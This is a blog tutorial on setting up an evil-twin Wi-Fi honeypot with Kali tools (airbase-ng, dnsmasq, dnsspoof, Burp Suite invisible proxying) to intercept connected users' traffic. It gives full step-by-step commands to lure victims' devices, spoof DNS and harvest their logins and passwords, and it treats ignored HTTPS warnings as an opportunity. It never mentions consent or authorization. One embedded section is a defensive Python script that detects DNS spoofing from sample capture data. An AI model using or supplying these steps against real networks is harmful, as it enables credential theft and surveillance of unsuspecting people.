You will act as a wifi hotspot providing Internet access. You are able to monitor those who connect to it and forward their traffic to the real server, acting as a man-in-the-middle. You can intercept almost all of their data, or modify it to your needs, before forwarding it on to the real server.
[CLIENT] <-------------> [ YOU ] <------------> [INTERNET]
What do you need?
- Linux OS; Kali
- Wifi Adapter that supports hosted network
- Internet
apt-get update
apt-get install aircrack-ng
NOTE: even for Kali and BackTrack users I suggest you use dnsmasq [instead of dhcpserver3 or dhcpd] and install it once again even if it's already installed.
Next you need to have dnsmasq; to get it type
apt-get install dnsmasq
Now you are ready .. Let's start ..
Setting Up
First we need to gather some information. Plug in your USB wifi adapter if you have one and in a terminal / console type
ifconfig
You should see something like this on your screen
There you will see wlan0 or even wlan1 [if you have an extra wifi adapter]. Take a note of what you have and then type
airmon-ng start wlan0
or
airmon-ng start wlan1
depending on what you have. You should be able to see (monitor mode enabled on mon0)
Now that's done .. let's proceed ..
Next we need to monitor the airwaves to get the names of the wifi access points the clients are trying to connect to. To do that type
airodump-ng mon0
You should be able to see a few clients, and under Probe you will find the name of the access point the client is trying to connect to. In this example we see that the client is searching for the wifi access point named achutetech
So we will create a fake AP with the name achutetech and try to make the client connect to us. To do this we type ..
airbase-ng --essid achutetech mon0
In our example we see this
That we have successfully managed to create a fake AP, and a client was also successfully associated with our fake AP. But the client will still not be fully connected to our AP since we haven't provided it with any IP address. To do so we use dnsmasq
Note: I have tried using dhcpd or dnsserver3 but they seem to be error prone while configuring them and I was getting errors like "Interface name is too long" and so on, so I switched to dnsmasq and it seems to work great :D
To verify that we have dnsmasq type
whereis dnsmasq
and to see whether we have the configuration file or not [I have noticed that even though dnsmasq was installed on Kali OS it didn't have the dnsmasq.conf file, so to get it type apt-get install dnsmasq]
and to verify that we have the config file type
ls /etc/ | grep dnsmasq
if dnsmasq.conf is returned then it's well and good. But if not, try
apt-get install dnsmasq
Ok, now that we have dnsmasq we need to configure a few things. Type
vim /etc/dnsmasq.conf
[How to use vim - I will be writing a quick tutorial on it soon ]
now scroll down to line 90 or thereabouts; you should see
# interface=
change it to
interface=at0
// at0 is the interface on which our FAKE AP lies
now scroll down further to line 141; you should see
#dhcp-range=192.168.0.50,192.168.0.150,12h
just remove the #
and you are good to go :D
Now we have to supply an IP address to your router [i.e. the fake AP]
to do so type
ifconfig at0 192.168.0.1 up
and to start the dhcp service type
dnsmasq
Now your clients should be able to get an IP address for themselves.
Ok.. so we have created the fake AP, our client is connected to us and we have supplied them with an address from our DHCP pool .. With all this done let's begin the FUN part..
What will we be doing?
We will be doing DNS spoofing, that is, we will forward all our client's requests to our own computer so that we can monitor the requests and even modify them if we want to, and get all those details like the sites visited, site user names and passwords .. and even modify those requests and responses .. sounds like a lot of fun, let's get going ..
DNS spoofing
to do DNS spoofing type
dnsspoof -i at0
what we are doing is forwarding all the DNS requests of our client to our own IP address .. we should be able to see something like this
now that's done: we have DNS spoofing running and every client request is being forwarded to our own IP address. Next we will bind a proxy to our IP address so that we can intercept traffic, and make it a transparent proxy so that the client is still able to connect to the Internet.
Note: we must be connected to the Internet for the client to be able to connect to the Internet.
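From the defender's side, the dnsspoof behaviour described above has a clear signature: every name the client asks for resolves to the gateway's own address. The following is an added example (not code from the original post) that correlates tcpdump-style DNS query and answer lines by transaction id and flags addresses that unrelated names collapse onto; the capture lines, the host addresses and the gateway 192.168.0.1 are constructed for illustration.

```python
"""Flag wholesale DNS spoofing in tcpdump-style DNS log lines (constructed sample)."""
import re
from collections import defaultdict

# Constructed capture, 'tcpdump -n port 53' style, taken on the client side. Three
# unrelated names all resolve to the gateway 192.168.0.1 (what dnsspoof produces when
# it answers every query with its own address); one name resolves normally.
SAMPLE_CAPTURE = """\
13:37:01.000001 IP 192.168.0.52.41000 > 192.168.0.1.53: 1001+ A? example.com. (29)
13:37:01.000400 IP 192.168.0.1.53 > 192.168.0.52.41000: 1001 1/0/0 A 192.168.0.1 (45)
13:37:02.000001 IP 192.168.0.52.41001 > 192.168.0.1.53: 1002+ A? mail.example.org. (34)
13:37:02.000400 IP 192.168.0.1.53 > 192.168.0.52.41001: 1002 1/0/0 A 192.168.0.1 (50)
13:37:03.000001 IP 192.168.0.52.41002 > 192.168.0.1.53: 1003+ A? login.example.net. (35)
13:37:03.000400 IP 192.168.0.1.53 > 192.168.0.52.41002: 1003 1/0/0 A 192.168.0.1 (51)
13:37:04.000001 IP 192.168.0.52.41003 > 192.168.0.1.53: 1004+ A? cdn.example.com. (33)
13:37:04.000400 IP 192.168.0.1.53 > 192.168.0.52.41003: 1004 1/0/0 A 203.0.113.10 (49)
"""

# Query line: "<txid>+ A? <name>."   Answer line: "<txid> <ans>/<auth>/<add> ... A <ipv4>"
QUERY_RE = re.compile(r"IP \S+ > \S+: (\d+)\+ A\? (\S+)\. \(\d+\)$")
ANSWER_RE = re.compile(r"IP \S+ > \S+: (\d+) \d+/\d+/\d+ .*?\bA (\d+(?:\.\d+){3})")

def parse_resolutions(capture: str) -> dict:
    """Correlate A queries with their answers by DNS transaction id -> {name: address}."""
    pending = {}   # txid -> queried name, until its answer arrives
    resolved = {}
    for line in capture.splitlines():
        q = QUERY_RE.search(line)
        if q:
            pending[q.group(1)] = q.group(2)
            continue
        a = ANSWER_RE.search(line)
        if a and a.group(1) in pending:
            resolved[pending.pop(a.group(1))] = a.group(2)
    return resolved

def spoofing_suspects(resolved: dict, gateway: str, min_names: int = 3) -> dict:
    """Return {address: [names]} for addresses that look spoofed: the gateway itself
    (a resolver never legitimately answers public names with its own LAN address),
    or any single address that several unrelated names collapse onto."""
    by_addr = defaultdict(list)
    for name, addr in resolved.items():
        by_addr[addr].append(name)
    return {addr: names for addr, names in by_addr.items()
            if addr == gateway or len(names) >= min_names}

if __name__ == "__main__":
    for addr, names in spoofing_suspects(parse_resolutions(SAMPLE_CAPTURE), "192.168.0.1").items():
        print(f"suspect {addr}: {', '.join(names)}")
```

The same check works on a live capture by feeding it the output of tcpdump on the client's interface; a resolver answering with the DHCP gateway's own address for public names is the thing to alert on.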
ok, let's start Burp Suite
Now go to the Proxy tab and then to its Options tab, and click on Add
Type in 80 in the bind-to-port box
and select your router address, i.e. your at0 address; in our case it is 192.168.0.1
Then click on the Request handling tab and tick the box for Support invisible proxying
click on OK and we are done ..
Repeat the same with port number 443 to handle HTTPS requests :P
Now you can see any request the client makes in the Intercept tab and you can tamper with it, monitor it, forward it or even drop it .. You are the BOSS now :D .. you can even get login IDs and passwords for the different sites the client uses .. but while using an HTTPS site the client will get a warning .. which most of the time they ignore :D
(http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html)